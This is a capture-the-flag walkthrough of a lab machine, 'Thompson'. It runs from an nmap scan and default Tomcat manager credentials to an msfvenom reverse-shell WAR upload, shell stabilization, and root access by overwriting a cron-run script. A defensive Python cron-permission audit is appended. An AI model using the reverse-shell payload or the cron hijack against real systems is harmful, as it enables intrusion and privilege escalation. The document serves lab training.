Thompson
1. Started with an nmap scan:
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 fc:05:24:81:98:7e:b8:db:05:92:a6:e7:8e:b0:21:11 (RSA)
| 256 60:c8:40:ab:b0:09:84:3d:46:64:61:13:fa:bc:1f:be (ECDSA)
|_ 256 b5:52:7e:9c:01:9b:98:0c:73:59:20:35:ee:23:f1:a5 (ED25519)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open http Apache Tomcat 8.5.5
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/8.5.5
MAC Address: 02:B6:65:1B:84:7F (Unknown)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.10 - 3.13
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
2. Started msfconsole
3. Checked the vulnerabilities with ChatGPT
4. msfconsole was hard to use; we used exploit multi/http/tomcat_mgr_upload
5. Set RHOST
6. Set the payload to java/meterpreter/reverse_tcp
7. We can't find the credentials
8. We go to http://<ip>:8080
9. We get the Apache Tomcat 8.5.5 login page
10. We go to the Manager App
11. It asks for credentials (which we don't have)
12. When we click 'cancel', the page that comes up shows the login entry:
<user username="tomcat" password="s3cret" roles="manager-gui"/>
13. Login with the credentials
14. Create an msfvenom payload:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.195.155 LPORT=4444 -f war > shell1.war
💡 Note: we created the payload by Googling the CVE for Tomcat 8.5.5 and found CVE-2017-12617; it is called WAR.
15. Upload that .war file to http://<ip>:8080/manager/html after entering the credentials, then open the shell/ directory with a listener already running on the port (connection received).
16. Let's stabilize the shell with:
python -c 'import pty; pty.spawn("/bin/bash")'
ctrl+z (background the shell)
stty raw -echo
fg (foreground the shell)
stty size (for the rows and columns)
export TERM=xterm
export SHELL=/bin/bash
stty rows <rows> cols <columns>
17. cd /home → cd jack → cat user.txt
18. There is an id.sh
19. We can access id.sh but can't su
20. cat /etc/crontab: we can see that id.sh gets executed periodically
21. echo "cp /root/root.txt /home/jack/root.txt" > id.sh
22. The next time cron runs id.sh (as root), root.txt is copied to /home/jack/root.txt, which we can cat to get the flag
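The root step above works because a root cron entry points at a script that a normal user can overwrite. As an added defender-side example (not part of the original writeup), this audit parses crontab lines and flags root entries whose program is owned by a non-root user or is group/world writable; the crontab text, file owners and modes are constructed to mirror the scenario, and the real check would use os.stat().

```python
import re
from dataclasses import dataclass

# Constructed sample crontab; schedule and extra entries are assumptions.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* *     * * *   root    /home/jack/id.sh
30 2    * * *   root    /usr/local/bin/cleanup.sh
"""

# Constructed stand-in for os.stat(): path -> (owner uid, mode bits).
# jack's uid (1000) and cleanup.sh are assumptions made for the example.
SAMPLE_FILES = {
    "/home/jack/id.sh": (1000, 0o775),       # owned by jack, run by root: finding
    "/usr/local/bin/cleanup.sh": (0, 0o777),  # root-owned but world writable: finding
    "/usr/bin/run-parts": (0, 0o755),         # root-owned, not writable by others: fine
}

# minute hour dom month dow user command (system crontab layout)
CRON_LINE = re.compile(r"^\s*(?P<sched>(?:\S+\s+){5})(?P<user>\S+)\s+(?P<cmd>.+)$")
ABS_PATH = re.compile(r"(?<!\S)/[\w./-]+")


@dataclass
class Finding:
    line: str
    script: str
    reason: str


def audit_crontab(text: str, files: dict) -> list[Finding]:
    """Return root cron entries whose referenced program can be modified by a non-root user."""
    findings = []
    for line in text.splitlines():
        m = CRON_LINE.match(line)
        if not m or line.lstrip().startswith("#") or m.group("user") != "root":
            continue
        for path in ABS_PATH.findall(m.group("cmd")):
            if path not in files:       # directories / unknown paths are skipped here
                continue
            uid, mode = files[path]
            if uid != 0:
                findings.append(Finding(line, path, f"owned by uid {uid}, not root"))
            elif mode & 0o022:          # group or world write bit set
                findings.append(Finding(line, path, "group/world writable"))
    return findings
```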
Awesome!!!